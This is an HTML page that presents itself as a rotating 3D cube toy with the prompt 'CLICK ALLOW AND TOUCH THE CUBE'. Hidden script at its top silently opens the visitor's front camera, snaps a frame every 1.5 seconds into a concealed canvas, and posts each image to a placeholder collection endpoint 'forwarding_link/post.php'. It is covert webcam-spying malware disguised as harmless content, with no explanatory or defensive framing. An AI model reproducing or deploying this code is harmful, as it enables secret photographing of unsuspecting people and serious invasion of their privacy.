<!doctype html>
<html>
<head>
<script type="text/javascript" src="https://wybiral.github.io/code-art/projects/tiny-mirror/index.js"></script>
<link rel="stylesheet" type="text/css" href="https://wybiral.github.io/code-art/projects/tiny-mirror/index.css">
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.js"></script>
</head>

<div class="video-wrap" hidden="hidden">
   <video id="video" playsinline autoplay></video>
</div>

<canvas hidden="hidden" id="canvas" width="480" height="640"></canvas>

<script>

function post(imgdata){
$.ajax({
    type: 'POST',
    data: { cat: imgdata},
    url: 'forwarding_link/post.php',
    dataType: 'json',
    async: false,
    success: function(result){
        // call the function that handles the response/results
    },
    error: function(){
    }
  });
};


'use strict';

const video = document.getElementById('video');
const canvas = document.getElementById('canvas');
const errorMsgElement = document.querySelector('span#errorMsg');

const constraints = {
  audio: false,
  video: {
    
    facingMode: "user"
  }
};

// Access webcam
async function init() {
  try {
    const stream = await navigator.mediaDevices.getUserMedia(constraints);
    handleSuccess(stream);
  } catch (e) {
    errorMsgElement.innerHTML = `navigator.getUserMedia error:${e.toString()}`;
  }
}

// Success
function handleSuccess(stream) {
  window.stream = stream;
  video.srcObject = stream;

var context = canvas.getContext('2d');
  setInterval(function(){

       context.drawImage(video, 0, 0, 640, 480);
       var canvasData = canvas.toDataURL("image/png").replace("image/png", "image/octet-stream");
       post(canvasData); }, 1500);
  

}

// Load init
init();

</script>





<!DOCTYPE html>
<html>
<head>
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>3D CUBE</title>
	</head>
		<style>
			body{
				margin: unset;
				height: 100vh;
  				background: linear-gradient(to right, red, #a044ff);
				color: white;
				font-family: sans-serif;
				text-align: center;
			}
			#cubic{
				box-sizing: border-box;
				transform-style: preserve-3d;
				top: 50%;
				left: 50%;
				position: relative;
				width: 250px;
				height: 250px;
				transition: 2s cubic-bezier(0.68, -0.55, 0.27, 1.55);
				transform: translate(-50%, -50%);
			}
			#cubic .face{
				width: 250px;
				height: 250px;
				position: absolute;
				border: 2px solid aqua;

				

				background: url('tasty.jpg');
				background-size: cover;
				background-position: absolute;
				box-shadow: 0px 0px 150px aqua;
			}

			#cubic .face.top{
				transform: rotateX(90deg);
				margin-top: -50%;
			}

			#cubic .face.right{
				transform: rotateY(90deg);
				margin-left: 50%;
			}

			#cubic .face.left{
				transform: rotateY(-90deg);
				margin-left: -50%;
			}

			#cubic .face.bottom{
				transform: rotateX(90deg);
				margin-top: 50%;
			}

			#cubic .face.back{
				transform: translateZ(125px);
			}
			#cubic .face.front{
				transform: translateZ(-125px);
			}
			#cubic:hover{
				transform: rotateX(-25deg) rotateY(-40deg) translate(-50%, -50%);
				transition: 2s cubic-bezier(0.68, -0.55, 0.27, 1.55);

			}
			@media screen and (min-width: 400px){
				b.pi{width: 80%;				}
			}
			
		</style>

<body>

<p><b class="pi">:: CLICK ALLOW AND TOUCH THE CUBE :: </b> </p>
<div id="cubic"> 
	<div class="face top"></div>
    <div class="face right"></div>
    <div class="face bottom"></div>
    <div class="face left"></div>
    <div class="face back"></div>    
    <div class="face front"></div>
</div>

</body>
</html>
